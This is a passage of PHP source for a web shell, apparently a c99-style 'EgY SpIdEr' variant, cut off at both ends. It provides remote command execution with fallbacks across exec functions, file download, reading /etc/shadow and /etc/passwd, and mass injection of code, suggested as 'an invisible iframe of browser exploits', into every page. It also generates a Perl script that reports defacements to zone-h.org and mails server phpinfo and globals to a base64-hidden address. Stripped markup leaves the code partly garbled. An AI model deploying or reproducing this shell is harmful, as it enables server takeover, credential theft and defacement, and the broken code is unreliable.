";}function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);$nscmd=htmlspecialchars($scmd);print $nscmd;}elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();print htmlspecialchars($pret);}}function input($type,$name,$value,$size){if (empty($value)){print "";}elseif(empty($name)&∅($size)){print "";}elseif(empty($size)){print "";}else {print "";}}function permcol($path){if (is_writable($path)){print "";callperms($path); print "";}elseif (!is_readable($path)&&!is_writable($path)){print "";callperms($path); print "";}else {print "";callperms($path);}}if ($dlink=="dwld"){download($_REQUEST['dwld']);}function download($dwfile) {$size = filesize($dwfile);@header("Content-Type: application/force-download;name=$dwfile");@header("Content-Transfer-Encoding: binary");@header("Content-Length: $size");@header("Content-Disposition: attachment; filename=$dwfile");@header("Expires: 0");@header("Cache-Control: no-cache, must-revalidate");@header("Pragma: no-cache");@readfile($dwfile); exit;}?>

Search milw0rm for MD5 hash
Search md5encryption.com for MD5 or SHA1 hash
Search CsTeam for MD5 hash

";}  }  else  {   if (!empty($rndcode)) {echo "Error: incorrect confimation!";}   $rnd = rand(0,9).rand(0,9).rand(0,9);   echo "
Self-remove: ".__FILE__."
Are you sure?
For confirmation, enter \"".$rnd."\"
 
";  } } if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

";}} if ($act == "feedback") {  $suppmail = base64_decode("ZWd5X3NwaWRlckBob3RtYWlsLmNvbQ==");  if (!empty($submit))  {   $ticket = substr(md5(microtime()+rand(1,1000)),0,6);   $body = "Attacker v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\nE-server: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\n\nIP: ".$REMOTE_ADDR;   if (!empty($fdbk_ref))   {    $tmp = @ob_get_contents();    ob_clean();    phpinfo();    $phpinfo = base64_encode(ob_get_contents());    ob_clean();    echo $tmp;    $body .= "\ni"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";   }   mail($suppmail,"Attacker v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);   echo "
Thanks for your feedback! Your ticket ID: ".$ticket.".
";  }  else {echo "
Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

Your name:

Your e-mail:

Message:


Attach server-info *

There are no checking in the form.

If you want to send a request for any help I know I will respond to you in case

* - strongly recommended, if you report bug, because we need it for bug-fix.

We understand languages: Arbic, English.

";} } if ($act == 'massbrowsersploit') {?>Mass Code Injection:

Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.

Dir to inject: <-- default is dir this shell is in
Code to inject: <-- best bet would be to include an invisible iframe of browser exploits
Edit again] -- [ Curr-Dir ]
";die(); }else {print "

[ Sorry, Can't create the index !! ]

";die();}}if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){print $sf."
";print "

";input ("text","indx","Index-name",35);print " ";input ("submit","qindsub","Create","");print $ef;die();}if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];if (mail($mailto,$subj,$mailtxt)){print "

[ Mail sended to $sfnt".$mailto." $efnt successfully ]

"; die();}else {print "

[ Error, Can't send the mail ]

";die();}} elseif(isset ($mailsub)&∅($mailto)) {print "

[ Error, Can't send the mail ]

";die();}if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){print $sf."
";print "

";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";input ("submit","mailsub","Send-mail","");print $ef;die();}if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}function callzone($nscdir){if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}fwrite ($fpz,"\$arq = @ARGV[0];\$grupo = @ARGV[1];chomp \$grupo;open(a,\"<\$arq\");@site = ;close(a);\$b = scalar(@site);for(\$a=0;\$a<=\$b;\$a++){chomp \$site[\$a];if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }print \"[+] Sending \$site[\$a]\n\";use IO::Socket::INET;\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";print \$sock \"Accept: */*\r\n\";print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";print \$sock \"Accept-Language: pt-br\r\n\";print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";print \$sock \"Connection: Keep-Alive\r\n\";print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";print \$sock \"Host: old.zone-h.org\r\n\";print \$sock \"Content-Length: 385\r\n\";print \$sock \"Pragma: no-cache\r\n\";print \$sock \"\r\n\";print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";close(\$sock);}");if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);}else{print "

[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet'];if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)){print "[ Can't complete the operation !! ]";}else {callfuncs("chmod 777 $zpl;chmod 777 $li");ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();print "

[ All sites should be sended to zone-h.org successfully !! ]";die();}}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){print $sf."
";print "

";input ("text","zonet","Hacker-name",35);print " ";input ("submit","zonesub","Send","");print $ef;die();}print "
"; print"";print"";print "
";function inisaf($iniv) { $chkini=ini_get($iniv);if(($chkini || strtolower($chkini)) !=='on'){print"OFF ( Not secured )";} else{print"ON ( Secured )";}}function inifunc($inif){$chkin=ini_get($inif);if ($chkin==""){print " None";}else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');while (!feof($opop)){ $nval= fgetc($opop);}}elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}if($nval=$owhich){print"ON";}else{print"OFF";} }print""; echo "
"; die(); } if(isset($_GET['egy'])) {   echo $head;   echo '
EgY SpIdEr
';   $memf = @file("meminfo");   if($memf)    {      $c = sizeof($memf);      for($i=0;$i<$c;$i++)        {          $info = explode(":",$memf[$i]);          if($info[1]==""){ $info[1]="---"; }          $r .= '';        }      echo $r;    }   else    {       echo '';    }   echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
    

 

  

  

  

 

  
     
  

 

';   echo "
";   die(); }  if(isset($_GET['news'])) {   echo $head;   echo '
EgY SpIdEr
';   $memf = @file("meminfo");   if($memf)    {      $c = sizeof($memf);      for($i=0;$i<$c;$i++)        {          $info = explode(":",$memf[$i]);          if($info[1]==""){ $info[1]="---"; }          $r .= '';        }      echo $r;    }   else    {       echo '';    }   echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
    

 

  

  

  

 

  
     
  

 

';   echo "
[ BACK ]
";   die(); }if(isset($_GET['5'])) {$_POST['cmd'] = 'systeminfo';}if(isset($_GET['6'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}if(isset($_GET['7'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}if(isset($_GET['8'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}if(isset($_GET['9'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}if(isset($_GET['10'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}if(isset($_GET['13'])) {$_